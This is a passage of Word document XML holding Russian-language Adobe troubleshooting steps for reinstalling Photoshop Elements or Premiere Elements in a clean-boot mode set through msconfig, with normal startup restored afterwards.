    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="main-pars_text_5"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">См. подробную информацию в разделе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Установка текущих сервисных пакетов Windows и других обновлений</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="main-pars_header_8"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение стандартных неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="main-pars_text_6"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если задания из предыдущего раздела не помогли Вам решить проблему, выполните следующие задания по устранению стандартных неполадок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="main-pars_header_9"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Установите Photoshop Elements или Adobe Premiere Elements в упрощенном режиме.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="main-pars_text_7"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Драйверы устройств и программное обеспечение, которые загружаются автоматически с Windows, могут конфликтовать с программой установки Elements и могут вызывать проблемы при установке. (Загружаемое автоматически программное обеспечение включает экранные заставки и средства защиты от вирусов.) Для предотвращения конфликтов переустановите Photoshop Elements / Premiere Elements в упрощенном режиме ОС Windows. В упрощенном режиме нестандартные драйверы устройств и программы автозагрузки отключены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы переустановить приложения в упрощенном режиме, выполните следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставьте</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>диск</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Photoshop Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adobe Premiere Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>дисковод</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Скопируйте</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>папку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adobe Photoshop Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adobe Premiere Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>диска</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>рабочий</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>стол</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, введите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msconfig</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в поле поиска и нажмите клавишу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ввод</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. (Для Windows 8 правой кнопкой мыши нажмите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Старт</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Поиск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1249447" cy="1454400"/>
            <wp:effectExtent l="19050" t="0" r="7853" b="0"/>
            <wp:docPr id="153" name="Рисунок 174" descr="mscon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sconfig"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1253050" cy="1458594"/>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 xml:space="preserve">На вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Автозагрузка</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отключить все</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. (В ОС Windows 8 нет параметра </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отключить все</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; вместо этого отключите каждый элемент по отдельности.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Службы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Скрыть все сервисы Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отключить все</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2436150" cy="1622983"/>
            <wp:effectExtent l="19050" t="0" r="2250" b="0"/>
            <wp:docPr id="154" name="Рисунок 176" descr="Отключите в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Отключите все"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2440347" cy="1625779"/>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 xml:space="preserve">В диалоговом окне </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройки системы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перезапустить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Двойным нажатием запустите файл Setup (или Setup.exe) в папке Photoshop Elements и Adobe Premiere Elements, которую вы скопировали на рабочий стол в шаге 2. Затем следуйте инструкциям на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, введите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msconfig</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в поле поиска и нажмите клавишу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ввод</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Общие</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обычный запуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и перезагрузите компьютер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2544150" cy="1694931"/>
            <wp:effectExtent l="19050" t="0" r="8550" b="0"/>
            <wp:docPr id="155" name="Рисунок 177" descr="Выполните обычный зап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Выполните обычный запуск"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2545474" cy="1695813"/>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Примечание. Если переустановка в упрощенном режиме не помогает, попробуйте установить и запустить программу на другом компьютере или на другом жестком диске.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
